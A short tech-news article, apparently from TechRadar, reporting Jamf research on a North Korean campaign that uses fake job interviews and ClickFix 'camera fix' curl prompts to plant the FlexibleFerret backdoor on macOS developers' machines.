- Jamf reports that North Korean actors are using fake job ads and ClickFix tactics to target macOS users
- Victims are tricked into running Curl commands in a terminal and installing the FlexibleFerret backdoor malware.
- The campaign, called Contagious Interview, allows for credential theft, file exfiltration and system hacking.
State-sponsored North Korean attackers are targeting macOS users with new malwareusing a strategy that combines two popular approaches – fake job postings and ClickFix, experts warn.
Jamf Security Researchers confirmed they found attacks in the wild using ClickFix, an attack method in which the victim is presented with a false problem and at the same time given a fix for it. It's an evolution of the old “You have a virus” pop-up that dominated the Internet in the early 2000s.
Jamf says that “DPRK-linked operators” from the FlexibleFerret malware family are creating fake companies, fake LinkedIn profiles and, most importantly, fake job advertisements as part of a broader campaign called Contagious Interview.
Curl commands and false fixes
The victims, mostly software developers, either found these websites and job postings themselves or were invited to interviews through LinkedIn.
After going through a few cycles, victims will be asked to record themselves on video through the employer's platform, but if they try to do so, the platform will tell them that their camera is not working properly.
They will then be given a fix – a Curl command to enter into the Terminal – which does not fix the problem, but rather introduces malware into the system.
This malware, essentially a backdoor, does several things: generates a short computer ID, checks for duplicates, and then extracts additional commands from a hard-coded command and control server.
These commands include collecting system information, uploading or downloading files, executing shell commands, obtaining Chrome profile information, or triggering automated credential theft.
“Organizations should treat unwanted terminal-based ‘interview’ ratings and ‘fix’ instructions as a high risk and ensure that users know to stop and report these prompts rather than follow them,” the researchers concluded.
The best antivirus for any budget
Follow TechRadar on Google News. And add us as your preferred source to get our expert news, reviews and opinions in your feeds. Be sure to click the “Subscribe” button!
And of course you can also Follow TechRadar on TikTok for news, reviews, unboxing videos and get regular updates from us on whatsapp too much.
